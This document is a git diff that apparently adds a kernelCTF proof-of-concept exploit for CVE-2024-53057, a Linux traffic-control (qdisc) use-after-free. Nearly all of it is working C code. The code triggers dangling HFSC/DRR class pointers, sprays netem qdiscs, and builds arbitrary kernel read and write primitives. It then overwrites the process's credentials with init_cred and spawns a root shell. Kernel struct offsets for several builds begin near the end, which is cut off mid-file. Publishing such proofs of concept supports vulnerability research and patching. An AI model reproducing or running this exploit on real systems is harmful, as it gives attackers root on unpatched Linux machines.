dist_netem_qdisc_msg dist_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct dist_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 32 + DIST_SIZE, + .rta_type = TCA_OPTIONS, + }, + .dist_hdr = { + .rta_len = 4 + DIST_SIZE, + .rta_type = TCA_NETEM_SLOT_DIST, + }, +}; + + +/* Add a basic filter */ +struct __attribute__((packed)) basic_filter_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr classid_hdr; + int classid; +}; + +struct basic_filter_msg basic_filter_msg = { + { + .nlmsg_len = sizeof(struct basic_filter_msg), + .nlmsg_type = RTM_NEWTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + .tcm_handle = 1, + .tcm_info = TC_H_MAKE(1 << 16, 3 << 8), + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "basic", + .options_hdr = + { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .classid_hdr = { + .rta_len = 8, + .rta_type = TCA_BASIC_CLASSID, + }, +}; + + +/* Delete all of a qdisc's filters */ +struct tf_msg del_filter_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a qdisc */ +struct tf_msg del_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a class */ +struct tf_msg del_class_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + 
{ + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Dump info for all qdiscs */ +struct tf_msg get_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_GETQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_DUMP, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + + +/* Syscall used to wait for RCU grace period */ +int membarrier(unsigned int flags, int cpu_id) { + return syscall(SYS_membarrier, flags, cpu_id); +} + +void pin_cpu (int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + if (sched_setaffinity(0, sizeof(set), &set)) + err_exit("[-] sched_setaffinity"); +} + +/* + * Send a message on the loopback device. Used to trigger qdisc enqueue and + * dequeue functions. + */ +struct sockaddr_in iaddr; +int nl_sock_fd, inet_sock_fd; +int nl_socks[4], inet_socks[4]; +void loopback_send (void) { + if (sendto(inet_sock_fd, "", 1, 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); +} + +/* Helper functions for sending netlink messages */ + +void netlink_write (int sock, struct nlmsghdr *m) { + struct { + struct nlmsghdr nh; + struct nlmsgerr ne; + } ack = {}; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + if (read(sock , &ack, sizeof(ack)) == -1) + err_exit("[-] read"); + if (ack.nh.nlmsg_type == NLMSG_ERROR && ack.ne.error) { + errno = -ack.ne.error; + err_exit("[-] netlink"); + } +} + +void netlink_write_noerr (int sock, struct nlmsghdr *m) { + m->nlmsg_flags &= ~NLM_F_ACK; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + m->nlmsg_flags |= NLM_F_ACK; +} + +int tc_add_qd (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = parent; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_qd (int parent) { + struct tf_msg *m = &del_qdisc_msg; + m->tm.tcm_parent = parent; + netlink_write(nl_sock_fd, m); +} + +int tc_add_cl (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = 
parent; + m->tm.tcm_handle = parent | handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_cl (int handle) { + struct tf_msg *m = &del_class_msg; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); +} + +void tc_add_fl (struct basic_filter_msg *m, int clid) { + m->tm.tcm_parent = clid & 0xffff0000; + m->classid = clid; + netlink_write(nl_sock_fd, m); +} + +void tc_del_fl (int clid) { + struct tf_msg *m = &del_filter_msg; + m->tm.tcm_parent = clid & 0xffff0000; + netlink_write(nl_sock_fd, m); + +} + +void switch_ns (int ns) { + nl_sock_fd = nl_socks[ns - 1]; + inet_sock_fd = inet_socks[ns - 1]; + curr_ns = ns; +} + +/* Trigger the bug, creating a dangling pointer to parent class. + * Qdiscs must be configured so packet is enqueued at target class. */ +void trigger_vuln (int parent) { + tc_add_qd(&delay_netem_qdisc_msg, parent, VULN_NETEM_HANDLE); + loopback_send(); +} + +/* Functions for reading and writing kernel memory */ + +void write_netem_parms(int handle, int *parms, struct tc_netem_slot *slot) { + struct parms_netem_qdisc_msg *m = &parms_netem_qdisc_msg; + if (parms) { + m->latency = *(long *)&parms[0]; + m->jitter = parms[2]; + // parms[3] corresponds to unwritable memory + m->qopt.loss = parms[4]; + m->ecn = parms[5]; + m->qopt.limit = parms[6]; + // parms[7] corresponds to unwritable memory + m->qopt.gap = parms[8]; + m->qopt.duplicate = parms[9]; + m->reorder.probability = parms[10]; + m->corrupt.probability = parms[11]; + m->rate64 = *(long *)&parms[12]; + } + if (slot) + m->slot = *slot; + tc_add_qd(m, 0, handle); +} + +void read_netem_parms (int handle, char *buf) { + int nread, tread = 0; + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= tread - sizeof(int); i++) { + if (*(int *)&msgbuf[i] == handle /* "netem" 
*/ + && *(long *)&msgbuf[i + 16] == 0x6d6574656e) { + off = i; + break; + } + } + + if (off != -1) { + memcpy(buf, msgbuf + off + 56, 8); // latency + memcpy(buf + 8, msgbuf + off + 68, 8); // jitter + memcpy(buf + 16, msgbuf + off + 36, 4); // loss + memcpy(buf + 20, msgbuf + off + 140, 4); // ecn + memcpy(buf + 24, msgbuf + off + 32, 4); // limit + memset(buf + 28, 0, 4); // counter (always zero) + memcpy(buf + 32, msgbuf + off + 40, 4); // gap + memcpy(buf + 36, msgbuf + off + 44, 4); // duplicate + memcpy(buf + 40, msgbuf + off + 96, 4); // reorder + memcpy(buf + 44, msgbuf + off + 108, 4); // corrupt + memcpy(buf + 48, msgbuf + off + 120, 8); // rate + } + memset(msgbuf, 0, sizeof(msgbuf)); +} + +long *stab_addr; +int stab_handle; +int stab_ns; +long stab_needle; +long stab_parms_buf[7], stab_slot_buf[5]; + +void setup_stab_read (int handle, long parms_kaddr, long slot_kaddr, int ns) { + int flags = 0x80; + memcpy((char *)stab_parms_buf + 9, &flags, 4); + slot_kaddr += 32; + memcpy((char *)stab_parms_buf + 33, &slot_kaddr, 8); + slot_kaddr -= 32; + + parms_kaddr += 48 - IFINDEX_OFF; + memcpy((char *)stab_parms_buf + 1, &parms_kaddr, 8); + parms_kaddr -= 48 - IFINDEX_OFF; + + stab_parms_buf[6] = 0xdeadbeef; // lower bytes of needle + + stab_slot_buf[1] = 0; // flags ; limit + stab_slot_buf[2] = parms_kaddr + 232; // ops + stab_slot_buf[3] = 0xbad57ab; // stab + stab_slot_buf[4] = 0; // hash + + stab_addr = &stab_slot_buf[3]; + stab_needle = stab_slot_buf[2] << 32 | stab_parms_buf[6]; + stab_handle = handle; + stab_ns = ns; +} + +void read_netem_stab (long needle, char *buf, int n) { + int nread, tread = 0; + + int old_ns = curr_ns; + switch_ns(stab_ns); + + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= tread - sizeof(int); i++) { + if (*(long *)&msgbuf[i] == needle) 
{ + off = i; + break; + } + } + + n = n > 24 ? 24 : n; + if (off != -1) + memcpy(buf, msgbuf + off + STAB_OFF, n); + else + printf("[-] Failed to find stab\n"); + + memset(msgbuf, 0, sizeof(msgbuf)); + switch_ns(old_ns); +} + +long stab_read_8 (long addr) { + long val; + int old_ns = curr_ns; + switch_ns(stab_ns); + *stab_addr = addr - 32; + write_netem_parms(stab_handle, stab_parms_buf, stab_slot_buf); + tc_add_qd(&parms_netem_qdisc_msg, 0, stab_handle); + read_netem_stab(stab_needle, &val, 8); + switch_ns(old_ns); + return val; +} + +int vt_handle; +int vt_ns; +long vt_dist_p_kaddr; +void setup_vt_write (int handle, long addr, int ns) { + int old_ns = curr_ns; + vt_ns = ns; + switch_ns(vt_ns); + vt_handle = handle; + vt_dist_p_kaddr = addr + PRIVDATA_OFF + SLOT_DIST_OFF; + hfsc_qdisc_msg.def = 0; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x150000); + switch_ns(old_ns); +} + +long root_addr; +void vt_write_8 (long addr, long val) { + long parms[7] = {}, *hfsc_class, dist_kaddr; + + int old_ns = curr_ns; + switch_ns(vt_ns); + + hfsc_class = &dist_netem_qdisc_msg.dist[HFSC_CLASS_START]; + ((int *)hfsc_class)[LEVEL_OFF/4] = 1; + hfsc_class[PARENT_OFF/8] = addr - CL_CVTMIN_OFF; + hfsc_class[CL_VT_OFF/8] = val; + + tc_add_qd(&dist_netem_qdisc_msg, 0, vt_handle); + + dist_kaddr = stab_read_8(vt_dist_p_kaddr); + dist_kaddr += TABLE_OFF + HFSC_CLASS_START + VT_NODE_OFF; + memcpy((char *)parms + 1, &dist_kaddr, 8); + + write_netem_parms(vt_handle, parms, NULL); + loopback_send(); + + switch_ns(old_ns); +} + +/* Functions for setting timers */ + +int add_order[] = { 0, 1, 2, 4, 9, 3, 5, 11, 10, 13, 12, 15, 6, 7, 8, 14, 16, }; +#define NUM_NODES (sizeof(add_order)/sizeof(*add_order)) +#define NUM_NEG_NODES 20 +int timer_fds[NUM_NODES]; +int neg_timerfds[NUM_NEG_NODES]; +void init_timers () { + for (int i = 0; i < NUM_NODES - 2; i++) { + timer_fds[add_order[i]] = timerfd_create(CLOCK_MONOTONIC, 0); + if (timer_fds[add_order[i]] == -1) + err_exit("[-] timerfd_create"); + } + for (int i = 0; i < 
NUM_NEG_NODES; i++) { + neg_timerfds[i] = timerfd_create(CLOCK_MONOTONIC, 0); + if (neg_timerfds[i] == -1) + err_exit("[-] timerfd_create"); + } +} + +void add_neg_nodes (void) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(-1); + for (int i = 0; i < NUM_NEG_NODES; i++) { + if (timerfd_settime(neg_timerfds[i], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); + } +} + +void add_timer_node (long label) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(label); + if (timerfd_settime(timer_fds[label], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +void rm_timer_node (long val) { + struct itimerspec t = {}; + if (timerfd_settime(timer_fds[val], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +#define GR 0x61c88647u +#define QDISC_HASH(x) ((x)*GR >> 28) +long handle_to_kaddr (int handle, long netdevq_kaddr) { + long next_addr; + next_addr = stab_read_8(netdevq_kaddr + NET_DEVICE_OFF) + QDISC_HASH_TABLE_OFF; + next_addr = stab_read_8(next_addr + 8*QDISC_HASH(handle)); + while (next_addr) { + if ((int)stab_read_8(next_addr + HANDLE_OFF - QDISC_HLIST_OFF) == handle) + return next_addr - QDISC_HLIST_OFF; + next_addr = stab_read_8(next_addr); + } + return 0; +} + +int drr_spray_and_find (int parent) { + int drr_spray[DRR_SPRAY]; + + for (int i = 0; i < DRR_SPRAY; i++) + drr_spray[i] = tc_add_cl(&drr_class_msg, parent, i + 1); + + int target = 0; + for (int i = 0; i < DRR_SPRAY; i++) { + if (!target) { + tc_add_fl(&basic_filter_msg, drr_spray[i]); + loopback_send(); + if (recv(inet_sock_fd, &msgbuf, 1, MSG_DONTWAIT) != -1) { + target = drr_spray[i]; + printf("[+] Found target DRR class %x\n", target); + continue; + } + tc_del_fl(drr_spray[i]); + } + tc_del_cl(drr_spray[i]); + } + + if (!target) + printf("[-] DRR spray on %x failed\n", parent); + + return target; +} + +int add_qdisc_timer_node (int parent, int root, int *spray_handles, + int spray_hash, int label, int ns_outer, int ns_inner) { + + /* Handles of 
the current leaf of the three branches, and handle of tbf qdisc's parent */ + int b1, b2, b3, pin, tbfp; + + switch_ns(ns_outer); + + /* Add subtree root */ + hfsc_qdisc_msg.def = 1; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + /* Set up upper layers */ + b1 = tc_add_cl(&rsc_class_msg, root, 1); + b1 = tc_add_qd(&drr_qdisc_msg, b1, 0xffff0000); + pin = tc_add_cl(&drr_class_msg, b1, 2); + b1 = tc_add_cl(&drr_class_msg, b1, 1); + + switch_ns(ns_inner); + b2 = tc_add_qd(&drr_qdisc_msg, -1, root + 0x30000); + switch_ns(ns_outer); + + b3 = tc_add_cl(&fsc_class_msg, root, 3); + b3 = tc_add_qd(&drr_qdisc_msg, b3, root + 0x40000); + tc_add_fl(&basic_filter_msg, b3 | 1); + + /* Create dangling pointer above TBF qdisc */ + tc_add_fl(&basic_filter_msg, b1); + trigger_vuln(b1); + + tc_del_fl(b1); + tc_add_fl(&basic_filter_msg, pin); + trigger_vuln(pin); + + hfsc_qdisc_msg.def = 3; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + tc_del_cl(b1); // Create dangling pointer + switch_ns(ns_inner); + tbfp = tc_add_cl(&drr_class_msg, b2, 1); + + /* Spray to prevent a later allocation + accidentally going under the dangling pointer + in case the allocation above missed it */ + for (int i = 1; i < DRR_SPRAY; i++) + tc_add_cl(&drr_class_msg, b2, i + 1); + tc_add_fl(&basic_filter_msg, tbfp); + + /* Add TBF qdisc */ + b2 = tc_add_qd(&tbf_qdisc_msg, tbfp, root + 0x50000); + b2 = tc_add_qd(&drr_qdisc_msg, b2, 0xffff0000); + tc_add_fl(&basic_filter_msg, b2 | 1); + + /* Create dangling pointer under TBF qdisc */ + b2 = tc_add_cl(&drr_class_msg, b2, 1); + + trigger_vuln(b2); + + tc_del_fl(tbfp); + tc_del_cl(b2); // Create dangling pointer + switch_ns(ns_outer); + b3 = drr_spray_and_find(b3); + + if (!b3) { + tc_del_qd(-1); + switch_ns(ns_inner); + tc_del_qd(-1); + switch_ns(ns_outer); + return 1; + } + + + switch_ns(ns_inner); + + for (int i = 0; i < clog_len; i++) + tc_add_cl(&drr_class_msg, 0xffff0000, i + 2); + + tc_add_qd(&stall_tbf_qdisc_msg, tbfp, 0); + + switch_ns(ns_outer); + + /* 
Choose netem handles */ + for (int i = 0x10000000, j = 0; j < NETEM_SPRAY; i += 0x10000) { + if (QDISC_HASH(i) == spray_hash) + spray_handles[j++] = i; + } + + /* Wait for previously deleted qdiscs to be freed */ + printf("[*] Adding qdisc timer node %d\n", label); + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Destroy TBF qdisc */ + switch_ns(ns_inner); + tc_del_cl(tbfp); + switch_ns(ns_outer); + + /* Set timer on TBF qdisc */ + if (sendto(inet_sock_fd, &msgbuf, LABEL_TO_VALUE(label), 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); + + /* Wait for TBF qdisc to be freed */ + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Spray netem qdiscs */ + for (int i = 0; i < NETEM_SPRAY; i++) + b3 = tc_add_qd(&parms_netem_qdisc_msg, b3, spray_handles[i]); + + return 0; +} + +int main (int argc, char **argv) { + + if (argc > 1) { + clog_len = atoi(argv[1]); + } else { + clog_len = CLOG_LEN; + } + + if (unshare(CLONE_NEWUSER) == -1) + err_exit("[-] unshare(CLONE_NEWUSER)"); + + for (int i = 0; i < 4; i++) { + if (unshare(CLONE_NEWNET) == -1) + err_exit("[-] unshare(CLONE_NEWNET)"); + + /* Open socket to send netlink commands to */ + nl_socks[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (nl_socks[i] == -1) + err_exit("[-] nl socket"); + + /* Set lo up */ + if_up_msg.ifi.ifi_index = if_nametoindex("lo"); + netlink_write(nl_socks[i], &if_up_msg); + + /* Open inet sockets */ + iaddr.sin_family = AF_INET; + iaddr.sin_port = htons(1); + iaddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + inet_socks[i] = socket(PF_INET, SOCK_DGRAM, 0); + if (inet_socks[i] == -1) + err_exit("[-] inet socket"); + if (bind(inet_socks[i], &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] inet bind"); + } + + pin_cpu(0); + + /* Add timer nodes to tree */ + init_timers(); + add_neg_nodes(); + for (int i = 0; i < NUM_NODES - 2; i++) + add_timer_node(add_order[i]); + + /* Add dangling qdisc pointers to tree */ + int 
parent, n1, n2, netem_spray1[NETEM_SPRAY], netem_spray2[NETEM_SPRAY], enq_qd; + + switch_ns(1); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x150000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x1000000, netem_spray1, 1, add_order[NUM_NODES - 2], 1, 3)); + + switch_ns(2); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x20000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x2000000, netem_spray2, 2, add_order[NUM_NODES - 1], 2, 4)); + + /* Enqueue a packet at netem_spray[0] for later */ + switch_ns(2); + hfsc_qdisc_msg.def = 2; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x20000); + parent = tc_add_cl(&rsc_class_msg, 0x20000, 2); + enq_qd = tc_add_qd(&delay_netem_qdisc_msg, parent, 0x2a0000); + loopback_send(); + + + /* Leak heap addresses of attacker netem qdiscs by removing 15 */ + + long n1_base_kaddr, n1_parms_kaddr, n1_slot_kaddr, n2_base_kaddr, n2_parms_kaddr, n2_slot_kaddr; + long n1_parms_buf[7] = {}, n2_parms_buf[7] = {}; + long n1_slot_buf[5] = {}, n2_slot_buf[5] = {}; + + rm_timer_node(15); + + switch_ns(1); + n1 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray1[i], n1_parms_buf); + if (n1_parms_buf[0]) { + n1 = netem_spray1[i]; + break; + } + } + + switch_ns(2); + n2 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray2[i], n2_parms_buf); + if (n2_parms_buf[0]) { + n2 = netem_spray2[i]; + break; + } + } + if (n1 == -1 || n2 == -1) { + printf("[-] Heap address leak failed: n1 = %x, n2 = %x\n", n1, n2); + exit(EXIT_FAILURE); + } + + if (NETEM_SPRAY > 1) { + switch_ns(1); + tc_del_qd(n1); + switch_ns(2); + tc_del_qd(n2); + } + + + n2_parms_kaddr = n1_parms_buf[0]; + n2_base_kaddr = n2_parms_kaddr & ~1023; + n2_slot_kaddr = n2_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + n1_parms_kaddr = n2_parms_buf[2]; + n1_base_kaddr = n1_parms_kaddr & ~1023; + n1_slot_kaddr = 
n1_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + printf("[+] Found qdiscs: n1 handle = %x, n1 addr = %p\n" + " n2 handle = %x, n2 addr = %p\n", + n1, n1_base_kaddr, n2, n2_base_kaddr); + + + /* Overwrite n2->slot_dist by removing 13 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (s) (c) + \ + (c) + + y is at &n2->latency + */ + + n2_parms_buf[2] = n1_parms_kaddr + 32; // y->rb_left = s = &n1->latency + 32 + n1_parms_buf[5] = n2_base_kaddr + PRIVDATA_OFF + SLOT_DIST_OFF; // s->rb_right = &n2->slot_dist + n1_parms_buf[6] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + + rm_timer_node(13); + + /* Overwrite n2->hash.next by removing 11 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->latency + 32 + */ + + n1_parms_buf[6] = n2_parms_kaddr + 32; // y->rb_left = p = &n2->latency + 32 + n2_parms_buf[6] = n1_slot_kaddr + 8; // p->rb_left = s = &n1->slot + 8 + n1_slot_buf[2] = n2_base_kaddr + 40; // s->rb_right = c = &n2->hash.next + n1_slot_buf[3] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + rm_timer_node(11); + + /* Set up arbitrary read */ + setup_stab_read(n2, n2_parms_kaddr, n2_slot_kaddr, 2); + + printf("[*] Arbitrary read set up\n"); + + /* Overwrite root qdisc's vt_tree by removing 9 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->slot + 8 + */ + + long root_qdisc_kaddr, netdevq_kaddr; + + netdevq_kaddr = stab_read_8(n1_base_kaddr + NETDEV_OFF); + root_qdisc_kaddr = stab_read_8(netdevq_kaddr + ROOT_QDISC_OFF); + + n1_slot_buf[3] = n1_parms_kaddr - 16; // y->rb_left = &n1->latency - 16 + n1_parms_buf[0] = n1_parms_kaddr + 32; // p->rb_left = &n1->latency + 32 + 
n1_parms_buf[5] = root_qdisc_kaddr + PRIVDATA_OFF + ROOT_OFF + + VT_TREE_OFF; // s->rb_right = &root_qdisc->privdata.root.vt_tree + n1_parms_buf[6] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + + rm_timer_node(9); + + /* Set up vt_node write primitive */ + setup_vt_write(n1, n1_base_kaddr, 1); + + printf("[*] Write-what-where set up\n"); + + /* Set f_owner pointer in socket file */ + if (fcntl(inet_socks[1], F_SETOWN, getpid()) == -1) + err_exit("[-] fcntl"); + + /* Read kernel pointers */ + long task_kaddr, init_task_kaddr, init_cred_kaddr, init_fs_kaddr; + long next_addr; + + printf("[*] Getting kernel pointers\n"); + + netdevq_kaddr = stab_read_8(n2_base_kaddr + NETDEV_OFF); + next_addr = handle_to_kaddr(enq_qd, netdevq_kaddr); + + next_addr = stab_read_8(next_addr + PRIVDATA_OFF + T_HEAD_OFF); + next_addr = stab_read_8(next_addr + SK_OFF); + next_addr = stab_read_8(next_addr + SOCK_OFF); + next_addr = stab_read_8(next_addr + FILE_OFF); + next_addr = stab_read_8(next_addr + F_OWNER_OFF + PID_OFF); + next_addr = stab_read_8(next_addr + TASKS_OFF); + task_kaddr = next_addr -= PID_LINKS_OFF; + + do { + init_task_kaddr = next_addr; + next_addr = stab_read_8(next_addr + REAL_PARENT_OFF); + } while (next_addr != init_task_kaddr); + + init_cred_kaddr = stab_read_8(init_task_kaddr + CRED_OFF); + init_fs_kaddr = stab_read_8(init_task_kaddr + FS_OFF); + + printf("[+] task: %p, init_cred: %p, init_fs: %p\n", + task_kaddr, init_cred_kaddr, init_fs_kaddr); + + printf("[*] Overwriting cred and fs\n"); + + /* LPE */ + vt_write_8(task_kaddr + FS_OFF, init_fs_kaddr); + vt_write_8(task_kaddr + CRED_OFF, init_cred_kaddr); + + if (getuid()) { + printf("[-] Privesc failed\n"); + exit(EXIT_FAILURE); + } + + printf("[*] Launching shell\n"); + system("/bin/sh"); + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/Makefile 
b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/Makefile new file mode 100644 index 000000000..bcae6348f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/Makefile @@ -0,0 +1,7 @@ +CFLAGS = -Wno-incompatible-pointer-types -Wno-format -Wno-address-of-packed-member -static -D MITIGATION + +exploit: exploit.c + gcc $(CFLAGS) -o $@ $< + +run: + ./exploit \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit new file mode 100644 index 000000000..833b38382 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c new file mode 100644 index 000000000..e3e8e4820 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c @@ -0,0 +1,1465 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#if defined(MITIGATION) || defined(COS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 280 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 336 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct 
disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 100 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 968 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 216 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 112 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1632 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1536 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 2008 // offsetof(struct task_struct, cred) +#define FS_OFF 2088 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 40 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 1000 + +#elif defined(LTS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 296 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 352 // 
